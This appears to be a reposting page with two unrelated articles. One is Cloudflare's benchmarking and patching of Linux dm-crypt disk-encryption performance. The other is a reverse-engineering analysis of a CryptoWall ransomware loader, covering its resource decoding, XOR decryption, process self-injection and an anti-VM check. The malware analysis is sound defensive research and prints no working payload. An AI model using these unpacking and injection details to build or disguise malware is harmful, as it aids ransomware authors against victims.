Speeding up Linux disk encryption

Speeding up Linux disk encryption

Original text by Ignat Korchagin

Data encryption at rest is a must-have for any modern Internet company. Many companies, however, don’t encrypt their disks, because they fear the potential performance penalty caused by encryption overhead.

Encrypting data at rest is vital for Cloudflare with more than 200 data centres across the world. In this post, we will investigate the performance of disk encryption on Linux and explain how we made it at least two times faster for ourselves and our customers!

Encrypting data at rest

When it comes to encrypting data at rest there are several ways it can be implemented on a modern operating system (OS). Available techniques are tightly coupled with a typical OS storage stack. A simplified version of the storage stack and encryption solutions can be found on the diagram below:

storage-stack

On the top of the stack are applications, which read and write data in files (or streams). The file system in the OS kernel keeps track of which blocks of the underlying block device belong to which files and translates these file reads and writes into block reads and writes, however the hardware specifics of the underlying storage device is abstracted away from the filesystem. Finally, the block subsystem actually passes the block reads and writes to the underlying hardware using appropriate device drivers.

The concept of the storage stack is actually similar to the well-known network OSI model, where each layer has a more high-level view of the information and the implementation details of the lower layers are abstracted away from the upper layers. And, similar to the OSI model, one can apply encryption at different layers (think about TLS vs IPsec or a VPN).

For data at rest we can apply encryption either at the block layers (either in hardware or in software) or at the file level (either directly in applications or in the filesystem).

Block vs file encryption

Generally, the higher in the stack we apply encryption, the more flexibility we have. With application level encryption the application maintainers can apply any encryption code they please to any particular data they need. The downside of this approach is they actually have to implement it themselves and encryption in general is not very developer-friendly: one has to know the ins and outs of a specific cryptographic algorithm, properly generate keys, nonces, IVs etc. Additionally, application level encryption does not leverage OS-level caching and Linux page cache in particular: each time the application needs to use the data, it has to either decrypt it again, wasting CPU cycles, or implement its own decrypted “cache”, which introduces more complexity to the code.

File system level encryption makes data encryption transparent to applications, because the file system itself encrypts the data before passing it to the block subsystem, so files are encrypted regardless if the application has crypto support or not. Also, file systems can be configured to encrypt only a particular directory or have different keys for different files. This flexibility, however, comes at a cost of a more complex configuration. File system encryption is also considered less secure than block device encryption as only the contents of the files are encrypted. Files also have associated metadata, like file size, the number of files, the directory tree layout etc., which are still visible to a potential adversary.

Encryption down at the block layer (often referred to as disk encryption or full disk encryption) also makes data encryption transparent to applications and even whole file systems. Unlike file system level encryption it encrypts all data on the disk including file metadata and even free space. It is less flexible though — one can only encrypt the whole disk with a single key, so there is no per-directory, per-file or per-user configuration. From the crypto perspective, not all cryptographic algorithms can be used as the block layer doesn’t have a high-level overview of the data anymore, so it needs to process each block independently. Most common algorithms require some sort of block chaining to be secure, so are not applicable to disk encryption. Instead, special modes were developed just for this specific use-case.

So which layer to choose? As always, it depends… Application and file system level encryption are usually the preferred choice for client systems because of the flexibility. For example, each user on a multi-user desktop may want to encrypt their home directory with a key they own and leave some shared directories unencrypted. On the contrary, on server systems, managed by SaaS/PaaS/IaaS companies (including Cloudflare) the preferred choice is configuration simplicity and security — with full disk encryption enabled any data from any application is automatically encrypted with no exceptions or overrides. We believe that all data needs to be protected without sorting it into «important» vs «not important» buckets, so the selective flexibility the upper layers provide is not needed.

Hardware vs software disk encryption

When encrypting data at the block layer it is possible to do it directly in the storage hardware, if the hardware supports it. Doing so usually gives better read/write performance and consumes less resources from the host. However, since most hardware firmware is proprietary, it does not receive as much attention and review from the security community. In the past this led to flaws in some implementations of hardware disk encryption, which render the whole security model useless. Microsoft, for example, started to prefer software-based disk encryption since then.

We didn’t want to put our data and our customers’ data to the risk of using potentially insecure solutions and we strongly believe in open-source. That’s why we rely only on software disk encryption in the Linux kernel, which is open and has been audited by many security professionals across the world.

Linux disk encryption performance

We aim not only to save bandwidth costs for our customers, but to deliver content to Internet users as fast as possible.

At one point we noticed that our disks were not as fast as we would like them to be. Some profiling as well as a quick A/B test pointed to Linux disk encryption. Because not encrypting the data (even if it is supposed-to-be a public Internet cache) is not a sustainable option, we decided to take a closer look into Linux disk encryption performance.

Device mapper and dm-crypt

Linux implements transparent disk encryption via a dm-crypt module and dm-crypt itself is part of device mapper kernel framework. In a nutshell, the device mapper allows pre/post-process IO requests as they travel between the file system and the underlying block device.

dm-crypt in particular encrypts «write» IO requests before sending them further down the stack to the actual block device and decrypts «read» IO requests before sending them up to the file system driver. Simple and easy! Or is it?

Benchmarking setup

For the record, the numbers in this post were obtained by running specified commands on an idle Cloudflare G9 server out of production. However, the setup should be easily reproducible on any modern x86 laptop.

Generally, benchmarking anything around a storage stack is hard because of the noise introduced by the storage hardware itself. Not all disks are created equal, so for the purpose of this post we will use the fastest disks available out there — that is no disks.

Instead Linux has an option to emulate a disk directly in RAM. Since RAM is much faster than any persistent storage, it should introduce little bias in our results.

The following command creates a 4GB ramdisk:

$ sudo modprobe brd rd_nr=1 rd_size=4194304
$ ls /dev/ram0

Now we can set up a dm-crypt instance on top of it thus enabling encryption for the disk. First, we need to generate the disk encryption key, «format» the disk and specify a password to unlock the newly generated key.

$ fallocate -l 2M crypthdr.img
$ sudo cryptsetup luksFormat /dev/ram0 --header crypthdr.img

WARNING!
========
This will overwrite data on crypthdr.img irrevocably.

Are you sure? (Type uppercase yes): YES
Enter passphrase:
Verify passphrase:

Those who are familiar with LUKS/dm-crypt might have noticed we used a LUKS detached header here. Normally, LUKS stores the password-encrypted disk encryption key on the same disk as the data, but since we want to compare read/write performance between encrypted and unencrypted devices, we might accidentally overwrite the encrypted key during our benchmarking later. Keeping the encrypted key in a separate file avoids this problem for the purposes of this post.

Now, we can actually «unlock» the encrypted device for our testing:

$ sudo cryptsetup open --header crypthdr.img /dev/ram0 encrypted-ram0
Enter passphrase for /dev/ram0:
$ ls /dev/mapper/encrypted-ram0
/dev/mapper/encrypted-ram0

At this point we can now compare the performance of encrypted vs unencrypted ramdisk: if we read/write data to /dev/ram0, it will be stored in plaintext. Likewise, if we read/write data to /dev/mapper/encrypted-ram0, it will be decrypted/encrypted on the way by dm-crypt and stored in ciphertext.

It’s worth noting that we’re not creating any file system on top of our block devices to avoid biasing results with a file system overhead.

Measuring throughput

When it comes to storage testing/benchmarking Flexible I/O tester is the usual go-to solution. Let’s simulate simple sequential read/write load with 4K block size on the ramdisk without encryption:

$ sudo fio --filename=/dev/ram0 --readwrite=readwrite --bs=4k --direct=1 --loops=1000000 --name=plain
plain: (g=0): rw=rw, bs=4K-4K/4K-4K/4K-4K, ioengine=psync, iodepth=1
fio-2.16
Starting 1 process
...
Run status group 0 (all jobs):
   READ: io=21013MB, aggrb=1126.5MB/s, minb=1126.5MB/s, maxb=1126.5MB/s, mint=18655msec, maxt=18655msec
  WRITE: io=21023MB, aggrb=1126.1MB/s, minb=1126.1MB/s, maxb=1126.1MB/s, mint=18655msec, maxt=18655msec

Disk stats (read/write):
  ram0: ios=0/0, merge=0/0, ticks=0/0, in_queue=0, util=0.00%

The above command will run for a long time, so we just stop it after a while. As we can see from the stats, we’re able to read and write roughly with the same throughput around 1126 MB/s. Let’s repeat the test with the encrypted ramdisk:

$ sudo fio --filename=/dev/mapper/encrypted-ram0 --readwrite=readwrite --bs=4k --direct=1 --loops=1000000 --name=crypt
crypt: (g=0): rw=rw, bs=4K-4K/4K-4K/4K-4K, ioengine=psync, iodepth=1
fio-2.16
Starting 1 process
...
Run status group 0 (all jobs):
   READ: io=1693.7MB, aggrb=150874KB/s, minb=150874KB/s, maxb=150874KB/s, mint=11491msec, maxt=11491msec
  WRITE: io=1696.4MB, aggrb=151170KB/s, minb=151170KB/s, maxb=151170KB/s, mint=11491msec, maxt=11491msec

Whoa, that’s a drop! We only get ~147 MB/s now, which is more than 7 times slower! And this is on a totally idle machine!

Maybe, crypto is just slow

The first thing we considered is to ensure we use the fastest crypto. cryptsetup allows us to benchmark all the available crypto implementations on the system to select the best one:

$ sudo cryptsetup benchmark
# Tests are approximate using memory only (no storage IO).
PBKDF2-sha1      1340890 iterations per second for 256-bit key
PBKDF2-sha256    1539759 iterations per second for 256-bit key
PBKDF2-sha512    1205259 iterations per second for 256-bit key
PBKDF2-ripemd160  967321 iterations per second for 256-bit key
PBKDF2-whirlpool  720175 iterations per second for 256-bit key
#  Algorithm | Key |  Encryption |  Decryption
     aes-cbc   128b   969.7 MiB/s  3110.0 MiB/s
 serpent-cbc   128b           N/A           N/A
 twofish-cbc   128b           N/A           N/A
     aes-cbc   256b   756.1 MiB/s  2474.7 MiB/s
 serpent-cbc   256b           N/A           N/A
 twofish-cbc   256b           N/A           N/A
     aes-xts   256b  1823.1 MiB/s  1900.3 MiB/s
 serpent-xts   256b           N/A           N/A
 twofish-xts   256b           N/A           N/A
     aes-xts   512b  1724.4 MiB/s  1765.8 MiB/s
 serpent-xts   512b           N/A           N/A
 twofish-xts   512b           N/A           N/A

It seems aes-xts with a 256-bit data encryption key is the fastest here. But which one are we actually using for our encrypted ramdisk?

$ sudo dmsetup table /dev/mapper/encrypted-ram0
0 8388608 crypt aes-xts-plain64 0000000000000000000000000000000000000000000000000000000000000000 0 1:0 0

We do use aes-xts with a 256-bit data encryption key (count all the zeroes conveniently masked by dmsetup tool — if you want to see the actual bytes, add the --showkeys option to the above command). The numbers do not add up however: cryptsetup benchmark tells us above not to rely on the results, as «Tests are approximate using memory only (no storage IO)», but that is exactly how we’ve set up our experiment using the ramdisk. In a somewhat worse case (assuming we’re reading all the data and then encrypting/decrypting it sequentially with no parallelism) doing back-of-the-envelope calculation we should be getting around (1126 * 1823) / (1126 + 1823) =~696 MB/s, which is still quite far from the actual 147 * 2 = 294 MB/s (total for reads and writes).

dm-crypt performance flags

While reading the cryptsetup man page we noticed that it has two options prefixed with --perf-, which are probably related to performance tuning. The first one is --perf-same_cpu_crypt with a rather cryptic description:

Perform encryption using the same cpu that IO was submitted on.  The default is to use an unbound workqueue so that encryption work is automatically balanced between available CPUs.  This option is only relevant for open action.

So we enable the option

$ sudo cryptsetup close encrypted-ram0
$ sudo cryptsetup open --header crypthdr.img --perf-same_cpu_crypt /dev/ram0 encrypted-ram0

Note: according to the latest man page there is also a cryptsetup refresh command, which can be used to enable these options live without having to «close» and «re-open» the encrypted device. Our cryptsetup however didn’t support it yet.

Verifying if the option has been really enabled:

$ sudo dmsetup table encrypted-ram0
0 8388608 crypt aes-xts-plain64 0000000000000000000000000000000000000000000000000000000000000000 0 1:0 0 1 same_cpu_crypt

Yes, we can now see same_cpu_crypt in the output, which is what we wanted. Let’s rerun the benchmark:

$ sudo fio --filename=/dev/mapper/encrypted-ram0 --readwrite=readwrite --bs=4k --direct=1 --loops=1000000 --name=crypt
crypt: (g=0): rw=rw, bs=4K-4K/4K-4K/4K-4K, ioengine=psync, iodepth=1
fio-2.16
Starting 1 process
...
Run status group 0 (all jobs):
   READ: io=1596.6MB, aggrb=139811KB/s, minb=139811KB/s, maxb=139811KB/s, mint=11693msec, maxt=11693msec
  WRITE: io=1600.9MB, aggrb=140192KB/s, minb=140192KB/s, maxb=140192KB/s, mint=11693msec, maxt=11693msec

Hmm, now it is ~136 MB/s which is slightly worse than before, so no good. What about the second option --perf-submit_from_crypt_cpus:

Disable offloading writes to a separate thread after encryption.  There are some situations where offloading write bios from the encryption threads to a single thread degrades performance significantly.  The default is to offload write bios to the same thread.  This option is only relevant for open action.

Maybe, we are in the «some situation» here, so let’s try it out:

$ sudo cryptsetup close encrypted-ram0
$ sudo cryptsetup open --header crypthdr.img --perf-submit_from_crypt_cpus /dev/ram0 encrypted-ram0
Enter passphrase for /dev/ram0:
$ sudo dmsetup table encrypted-ram0
0 8388608 crypt aes-xts-plain64 0000000000000000000000000000000000000000000000000000000000000000 0 1:0 0 1 submit_from_crypt_cpus

And now the benchmark:

$ sudo fio --filename=/dev/mapper/encrypted-ram0 --readwrite=readwrite --bs=4k --direct=1 --loops=1000000 --name=crypt
crypt: (g=0): rw=rw, bs=4K-4K/4K-4K/4K-4K, ioengine=psync, iodepth=1
fio-2.16
Starting 1 process
...
Run status group 0 (all jobs):
   READ: io=2066.6MB, aggrb=169835KB/s, minb=169835KB/s, maxb=169835KB/s, mint=12457msec, maxt=12457msec
  WRITE: io=2067.7MB, aggrb=169965KB/s, minb=169965KB/s, maxb=169965KB/s, mint=12457msec, maxt=12457msec

~166 MB/s, which is a bit better, but still not good…

Asking the community

Being desperate we decided to seek support from the Internet and posted our findings to the dm-crypt mailing list, but the response we got was not very encouraging:

If the numbers disturb you, then this is from lack of understanding on your side. You are probably unaware that encryption is a heavy-weight operation…

We decided to make a scientific research on this topic by typing «is encryption expensive» into Google Search and one of the top results, which actually contains meaningful measurements, is… our own post about cost of encryption, but in the context of TLS! This is a fascinating read on its own, but the gist is: modern crypto on modern hardware is very cheap even at Cloudflare scale (doing millions of encrypted HTTP requests per second). In fact, it is so cheap that Cloudflare was the first provider to offer free SSL/TLS for everyone.

Digging into the source code

When trying to use the custom dm-crypt options described above we were curious why they exist in the first place and what is that «offloading» all about. Originally we expected dm-crypt to be a simple «proxy», which just encrypts/decrypts data as it flows through the stack. Turns out dm-crypt does more than just encrypting memory buffers and a (simplified) IO traverse path diagram is presented below:

dm-crypt

When the file system issues a write request, dm-crypt does not process it immediately — instead it puts it into a workqueue named «kcryptd». In a nutshell, a kernel workqueue just schedules some work (encryption in this case) to be performed at some later time, when it is more convenient. When «the time» comes, dm-crypt sends the request to Linux Crypto API for actual encryption. However, modern Linux Crypto API is asynchronous as well, so depending on which particular implementation your system will use, most likely it will not be processed immediately, but queued again for «later time». When Linux Crypto API will finally do the encryptiondm-crypt may try to sort pending write requests by putting each request into a red-black tree. Then a separate kernel thread again at «some time later» actually takes all IO requests in the tree and sends them down the stack.

Now for read requests: this time we need to get the encrypted data first from the hardware, but dm-crypt does not just ask for the driver for the data, but queues the request into a different workqueue named «kcryptd_io». At some point later, when we actually have the encrypted data, we schedule it for decryption using the now familiar «kcryptd» workqueue. «kcryptd» will send the request to Linux Crypto API, which may decrypt the data asynchronously as well.

To be fair the request does not always traverse all these queues, but the important part here is that write requests may be queued up to 4 times in dm-crypt and read requests up to 3 times. At this point we were wondering if all this extra queueing can cause any performance issues. For example, there is a nice presentation from Google about the relationship between queueing and tail latency. One key takeaway from the presentation is:

A significant amount of tail latency is due to queueing effects

So, why are all these queues there and can we remove them?

Git archeology

No-one writes more complex code just for fun, especially for the OS kernel. So all these queues must have been put there for a reason. Luckily, the Linux kernel source is managed by git, so we can try to retrace the changes and the decisions around them.

The «kcryptd» workqueue was in the source since the beginning of the available history with the following comment:

Needed because it would be very unwise to do decryption in an interrupt context, so bios returning from read requests get queued here.

So it was for reads only, but even then — why do we care if it is interrupt context or not, if Linux Crypto API will likely use a dedicated thread/queue for encryption anyway? Well, back in 2005 Crypto API was not asynchronous, so this made perfect sense.

In 2006 dm-crypt started to use the «kcryptd» workqueue not only for encryption, but for submitting IO requests:

This patch is designed to help dm-crypt comply with the new constraints imposed by the following patch in -mm: md-dm-reduce-stack-usage-with-stacked-block-devices.patch

It seems the goal here was not to add more concurrency, but rather reduce kernel stack usage, which makes sense again as the kernel has a common stack across all the code, so it is a quite limited resource. It is worth noting, however, that the Linux kernel stack has been expanded in 2014 for x86 platforms, so this might not be a problem anymore.

first version of «kcryptd_io» workqueue was added in 2007 with the intent to avoid:

starvation caused by many requests waiting for memory allocation…

The request processing was bottlenecking on a single workqueue here, so the solution was to add another one. Makes sense.

We are definitely not the first ones experiencing performance degradation because of extensive queueing: in 2011 a change was introduced to conditionally revert some of the queueing for read requests:

If there is enough memory, code can directly submit bio instead queuing this operation in a separate thread.

Unfortunately, at that time Linux kernel commit messages were not as verbose as today, so there is no performance data available.

In 2015 dm-crypt started to sort writes in a separate «dmcrypt_write» thread before sending them down the stack:

On a multiprocessor machine, encryption requests finish in a different order than they were submitted. Consequently, write requests would be submitted in a different order and it could cause severe performance degradation.

It does make sense as sequential disk access used to be much faster than the random one and dm-crypt was breaking the pattern. But this mostly applies to spinning disks, which were still dominant in 2015. It may not be as important with modern fast SSDs (including NVME SSDs).

Another part of the commit message is worth mentioning:

…in particular it enables IO schedulers like CFQ to sort more effectively…

It mentions the performance benefits for the CFQ IO scheduler, but Linux schedulers have improved since then to the point that CFQ scheduler has been removed from the kernel in 2018.

The same patchset replaces the sorting list with a red-black tree:

In theory the sorting should be performed by the underlying disk scheduler, however, in practice the disk scheduler only accepts and sorts a finite number of requests. To allow the sorting of all requests, dm-crypt needs to implement its own sorting.

The overhead associated with rbtree-based sorting is considered negligible so it is not used conditionally.

All that make sense, but it would be nice to have some backing data.

Interestingly, in the same patchset we see the introduction of our familiar «submit_from_crypt_cpus» option:

There are some situations where offloading write bios from the encryption threads to a single thread degrades performance significantly

Overall, we can see that every change was reasonable and needed, however things have changed since then:

  • hardware became faster and smarter
  • Linux resource allocation was revisited
  • coupled Linux subsystems were rearchitected

And many of the design choices above may not be applicable to modern Linux.

The «clean-up»

Based on the research above we decided to try to remove all the extra queueing and asynchronous behaviour and revert dm-crypt to its original purpose: simply encrypt/decrypt IO requests as they pass through. But for the sake of stability and further benchmarking we ended up not removing the actual code, but rather adding yet another dm-crypt option, which bypasses all the queues/threads, if enabled. The flag allows us to switch between the current and new behaviour at runtime under full production load, so we can easily revert our changes should we see any side-effects. The resulting patch can be found on the Cloudflare GitHub Linux repository.

Synchronous Linux Crypto API

From the diagram above we remember that not all queueing is implemented in dm-crypt. Modern Linux Crypto API may also be asynchronous and for the sake of this experiment we want to eliminate queues there as well. What does «may be» mean, though? The OS may contain different implementations of the same algorithm (for example, hardware-accelerated AES-NI on x86 platforms and generic C-code AES implementations). By default the system chooses the «best» one based on the configured algorithm prioritydm-crypt allows overriding this behaviour and request a particular cipher implementation using the capi: prefix. However, there is one problem. Let us actually check the available AES-XTS (this is our disk encryption cipher, remember?) implementations on our system:

$ grep -A 11 'xts(aes)' /proc/crypto
name         : xts(aes)
driver       : xts(ecb(aes-generic))
module       : kernel
priority     : 100
refcnt       : 7
selftest     : passed
internal     : no
type         : skcipher
async        : no
blocksize    : 16
min keysize  : 32
max keysize  : 64
--
name         : __xts(aes)
driver       : cryptd(__xts-aes-aesni)
module       : cryptd
priority     : 451
refcnt       : 1
selftest     : passed
internal     : yes
type         : skcipher
async        : yes
blocksize    : 16
min keysize  : 32
max keysize  : 64
--
name         : xts(aes)
driver       : xts-aes-aesni
module       : aesni_intel
priority     : 401
refcnt       : 1
selftest     : passed
internal     : no
type         : skcipher
async        : yes
blocksize    : 16
min keysize  : 32
max keysize  : 64
--
name         : __xts(aes)
driver       : __xts-aes-aesni
module       : aesni_intel
priority     : 401
refcnt       : 7
selftest     : passed
internal     : yes
type         : skcipher
async        : no
blocksize    : 16
min keysize  : 32
max keysize  : 64

We want to explicitly select a synchronous cipher from the above list to avoid queueing effects in threads, but the only two supported are xts(ecb(aes-generic)) (the generic C implementation) and __xts-aes-aesni (the x86 hardware-accelerated implementation). We definitely want the latter as it is much faster (we’re aiming for performance here), but it is suspiciously marked as internal (see internal: yes). If we check the source code:

Mark a cipher as a service implementation only usable by another cipher and never by a normal user of the kernel crypto API

So this cipher is meant to be used only by other wrapper code in the Crypto API and not outside it. In practice this means, that the caller of the Crypto API needs to explicitly specify this flag, when requesting a particular cipher implementation, but dm-crypt does not do it, because by design it is not part of the Linux Crypto API, rather an «external» user. We already patch the dm-crypt module, so we could as well just add the relevant flag. However, there is another problem with AES-NI in particular: x86 FPU. «Floating point» you say? Why do we need floating point math to do symmetric encryption which should only be about bit shifts and XOR operations? We don’t need the math, but AES-NI instructions use some of the CPU registers, which are dedicated to the FPU. Unfortunately the Linux kernel does not always preserve these registers in interrupt context for performance reasons (saving/restoring FPU is expensive). But dm-crypt may execute code in interrupt context, so we risk corrupting some other process data and we go back to «it would be very unwise to do decryption in an interrupt context» statement in the original code.

Our solution to address the above was to create another somewhat «smart» Crypto API module. This module is synchronous and does not roll its own crypto, but is just a «router» of encryption requests:

  • if we can use the FPU (and thus AES-NI) in the current execution context, we just forward the encryption request to the faster, «internal» __xts-aes-aesni implementation (and we can use it here, because now we are part of the Crypto API)
  • otherwise, we just forward the encryption request to the slower, generic C-based xts(ecb(aes-generic)) implementation

Using the whole lot

Let’s walk through the process of using it all together. The first step is to grab the patches and recompile the kernel (or just compile dm-crypt and our xtsproxy modules).

Next, let’s restart our IO workload in a separate terminal, so we can make sure we can reconfigure the kernel at runtime under load:

$ sudo fio --filename=/dev/mapper/encrypted-ram0 --readwrite=readwrite --bs=4k --direct=1 --loops=1000000 --name=crypt
crypt: (g=0): rw=rw, bs=4K-4K/4K-4K/4K-4K, ioengine=psync, iodepth=1
fio-2.16
Starting 1 process
...

In the main terminal make sure our new Crypto API module is loaded and available:

$ sudo modprobe xtsproxy
$ grep -A 11 'xtsproxy' /proc/crypto
driver       : xts-aes-xtsproxy
module       : xtsproxy
priority     : 0
refcnt       : 0
selftest     : passed
internal     : no
type         : skcipher
async        : no
blocksize    : 16
min keysize  : 32
max keysize  : 64
ivsize       : 16
chunksize    : 16

Reconfigure the encrypted disk to use our newly loaded module and enable our patched dm-crypt flag (we have to use low-level dmsetup tool as cryptsetup obviously is not aware of our modifications):

$ sudo dmsetup table encrypted-ram0 --showkeys | sed 's/aes-xts-plain64/capi:xts-aes-xtsproxy-plain64/' | sed 's/$/ 1 force_inline/' | sudo dmsetup reload encrypted-ram0

We just «loaded» the new configuration, but for it to take effect, we need to suspend/resume the encrypted device:

$ sudo dmsetup suspend encrypted-ram0 && sudo dmsetup resume encrypted-ram0

And now observe the result. We may go back to the other terminal running the fio job and look at the output, but to make things nicer, here’s a snapshot of the observed read/write throughput in Grafana:

read-throughput-annotated
write-throughput-annotated

Wow, we have more than doubled the throughput! With the total throughput of ~640 MB/s we’re now much closer to the expected ~696 MB/s from above. What about the IO latency? (The await statistic from the iostat reporting tool):

await-annotated

The latency has been cut in half as well!

To production

So far we have been using a synthetic setup with some parts of the full production stack missing, like file systems, real hardware and most importantly, production workload. To ensure we’re not optimising imaginary things, here is a snapshot of the production impact these changes bring to the caching part of our stack:

prod

This graph represents a three-way comparison of the worst-case response times (99th percentile) for a cache hit in one of our servers. The green line is from a server with unencrypted disks, which we will use as baseline. The red line is from a server with encrypted disks with the default Linux disk encryption implementation and the blue line is from a server with encrypted disks and our optimisations enabled. As we can see the default Linux disk encryption implementation has a significant impact on our cache latency in worst case scenarios, whereas the patched implementation is indistinguishable from not using encryption at all. In other words the improved encryption implementation does not have any impact at all on our cache response speed, so we basically get it for free! That’s a win!

We’re just getting started

This post shows how an architecture review can double the performance of a system. Also we reconfirmed that modern cryptography is not expensive and there is usually no excuse not to protect your data.

We are going to submit this work for inclusion in the main kernel source tree, but most likely not in its current form. Although the results look encouraging we have to remember that Linux is a highly portable operating system: it runs on powerful servers as well as small resource constrained IoT devices and on many other CPU architectures as well. The current version of the patches just optimises disk encryption for a particular workload on a particular architecture, but Linux needs a solution which runs smoothly everywhere.

That said, if you think your case is similar and you want to take advantage of the performance improvements now, you may grab the patches and hopefully provide feedback. The runtime flag makes it easy to toggle the functionality on the fly and a simple A/B test may be performed to see if it benefits any particular case or setup. These patches have been running across our wide network of more than 200 data centres on five generations of hardware, so can be reasonably considered stable. Enjoy both performance and security from Cloudflare for all!

Genetic Analysis of CryptoWall Ransomware

Genetic Analysis of CryptoWall Ransomware

Original text by Ryan Cornateanu

A strain of a Crowti ransomware emerged, the variant known as CryptoWall, was spotted by researchers in early 2013. Ransomware by nature is extraordinarily destructive but this one in particular was a bit beyond that. Over the next 2 years, with over 5.25 billion files encrypted and 1 million+ systems infected, this virus has definitely made its mark in the pool of cyber weapons. Below you can find a list of the top ten infected countries:

Image for post
Source: Dell Secure Works

CryptoWall is distinct in that its campaign ID initially gets sent back to their C2 servers for verification purposes. The motivation behind these ID’s are to track samples by the loader vectors. The one we will be analyzing in our laboratory experiment has the crypt1 ID that was first seen around February 26th, 2014. The infection vector is still unknown today but we will be showing how to unpack the loader, and extract the main ransomware file. Some of the contagions have been caused by Drive-by downloads, Cutwail/Upatre, Infinity/Goon exploit kit, Magnitude exploit kit, Nuclear exploit kit/Pony Loader, and Gozi/Neverquest.

Initial Analysis

We will start by providing the hash of the packed loader file:

➜  CryptoWall git:(master) openssl md5 cryptowall.bin
MD5(cryptowall.bin)= 47363b94cee907e2b8926c1be61150c7

Running the file command on the bin executable, we can confirm that this is a PE32 executable (GUI) Intel 80386, for MS Windows. Similar to the analysis we did on the Cozy Bear’s Beacon Loader, we will be using IDA Pro as our flavor of disassembler tools.

Loading the packed executable into our control flow graph view, it becomes apparent fairly quickly that this is packed loader code, and the real CryptoWall code is hiding somewhere within.

Image for post
WinMain CFG View

Checking the resource section of this binary only shows that it has two valid entries; the first one being a size of 91,740 bytes. Maybe we will get lucky and the hidden PE will be here?

Image for post
Dumped resource section

Unfortunately not! This looks like some custom base64 encoded data that will hopefully get used later somewhere down the line in our dissection of the virus. If we scroll down to the end of WinMain() you’ll notice a jump instruction that points to EAX. It will look something like this in the decompiler view:

JUMPOUT(eax=decrypted_code_segment);

Unpacking Binary Loaders

At this point, we have to open up a debugger, and view this area of code as it is being resolved dynamically. What you will want to do is a set a breakpoint at 0x00402dda, which is the location of the jmp instruction. Once you hit this breakpoint after continuing execution, you’ll notice EAX now points to a new segment of code. Dumping EAX in the disassembler will lead you to the 2nd stage loader. Use the debugger’s step into feature, and our instruction pointer should be safely inside the decrypted loader area.

Image for post
2nd Stage

Let’s go over what is happening at this stage of the malware. EBP+var_EA6E gets loaded effectively into EDXEAX then holds the index count incrementer to follow the next few bytes at data address 302C9AEh.

.data:0302CA46   mov     bl, byte ptr (loc_302C9AE - 302C9AEh)[eax]
.data:0302CA48 add ebx, esi
.data:0302CA4A mov [edx], bl

All this snippet of code is doing is loading bytes from the address mentioned above and storing it at bl (the lower 8 bits of EBX). The byte from bl is then moved into the pointer value of EDX. At the end of this routine EBP+var_EA6E will hold a valid address that gets called as EAX (we can see the line highlighted in red in the image above). Stepping into EAX will now bring us to the third stage of the loading process.

A lot is going on at this point; this function has a couple thousand lines of assembly to go over, so at this point it’s better we open the decompiler view to see what is happening. After resolving some of the strings on the stack, there is some key information that starts to pop up on the resource section we viewed earlier.

pLockRsrc = GetProcAddress(kernel32, &LockResource);
pSizeofResource = GetProcAddress(kernel32, &SizeofResource);
pLoadResource = GetProcAddress(kernel32, &LoadResource);
pGetModuleHandle = GetProcAddress(kernel32, &GetModuleHandleA);
pFindRsrc = GetProcAddress(kernel32, &FindResourceA);
pVirtualAlloc = GetProcAddress(kernel32, &VirtualAlloc);

The malware is loading all functions dynamically that have to do with our resource section. After the data gets loaded into memory, CryptoWall begins its custom base64 decoding technique and then continues to a decryption method as seen below.

Image for post

Most of what is happening here can be explained in a decryptor I wrote that resolves the shellcode from the resource section. If you head over to the python script, you’ll notice the custom base64 decoder is fairly simple. It will use a hardcoded charset, and check to see if any of the bytes from the resource section match a byte from the charset; if it is a match, it breaks from the loop. The next character gets subtracted by one and compared to a value of zero, if greater, it will take that value and modulate by 256; that byte will then get stored in a buffer array. It will perform this in a loop 89,268 times, as that is the size of the encoded string inside the resource section.

Secondary to this, another decryption process starts on our recently decoded data from the algorithm above. Looking at the python script again, we can see that hardcoded XOR keys were extracted in the debugger if you set a breakpoint inside the decryption loop. All that is happening here is each byte is getting decrypted by a rotating three byte key. Once the loop is finished, the code will return the address of the decrypted contents, which essentially just contains an address to another subroutine:

loop:
buffer = *(base_addr + idx) - (*n ^ (&addr + 0xFFE6DF5F + idx));
*(base_addr + idx++) = buffer;

Fourth_Stage_Loader = base_addr;
return (&Fourth_Stage_Loader)(buffer, b64_decoded_str, a1);

The base_addr transfers data to another variable that we named Fourth_Stage_Loader which holds the address of the newest function, and can be used as a caller. If we dump the address at call dword ptr gs:(loc_1920A1–1920A1h)[eax] into memory, you’ll see bytes that start with a generic x86 function prologue like 55 8b ec 81. Dump this to a file, and we can actually emulate this shellcode. In doing so, we don’t have to step through all this code in the debugger; instead it will hopefully tell us how to unpack and get to the main CryptoWall file.

Side note: the python script I wrote will automatically decode & decrypt the resource section, and dump it to a bin file by running => python decrypt_shellcode_loader.py -e.

0x1000: push ebp
0x1001: mov ebp, esp
0x1003: add esp, 0xfffff004
....

An easy way to see what this next stage in the malware’s loader is doing is by using one of my favorite shellcode emulator tools called ScDbg. By using this tool, we can figure out exactly where we need to set our breakpoints in order to get to the main ransomware file. We are going to look for calls such as VirtualAllocWriteProcessMemoryCreateProcessA, etc.

C:\> scdbg.exe /s 3200000 /bp WriteProcessMemory /f dump.binLoaded 10587 bytes from file extractions/pe_process_injector_dump.bin
Breakpoint 0 set at 7c802213
Initialization Complete..
Max Steps: 3200000
Using base offset: 0x4010004011cf GetProcAddress(LoadLibraryA)
40165f GetProcAddress(VirtualAlloc)
401c46 GetProcAddress(GetCurrentProcessId)
401c52 GetCurrentProcessId() = 29
...
401d46 CloseHandle(18be)
401f40 VirtualAlloc(base=0 , sz=20400) = 600000
4021e1 VirtualAllocEx(pid=1269, base=400000 , sz=25000) = 621000
/* Breakpoint 0 hit at: 7c802213 */
4021fe WriteProcessMemory(pid=1269, base=400000 , buf=600000, sz=400, written=12fd70)
/* Breakpoint 0 hit at: 7c802213 */
40224e WriteProcessMemory(pid=1269, base=401000 , buf=600400, sz=16400, written=12fd70)

Interesting… it looks like the malware is allocating memory to its own process by using GetCurrentProcessId() and allocating a large enough space to inject a PE file into itself. After memory allocation, CryptoWall injects the payload file twice, once for the header, and the second time for the rest of the file. If you set a breakpoint at WriteProcessMemory, and continue execution twice, you can dump the second argument (ECX) on the stack to see the hidden PE file.

Image for post

There is an Anti-VM trick along the way in the 3rd stage part of the loader process that needs to be patched in order to hit the injection process, so I wrote an x32Dbg python plugin to help automate the patching and dumping operation.

Reversing the Main Crypto Binary

CryptoWall’s entry point starts off by dynamically resolving all imports to obtain all of NTDLL’s offsets by using the process environment block.

Image for post

It will then call a subroutine that is responsible for using the base address of the loaded DLL and uses many hardcoded DWORD addresses to locate hundreds of functions.

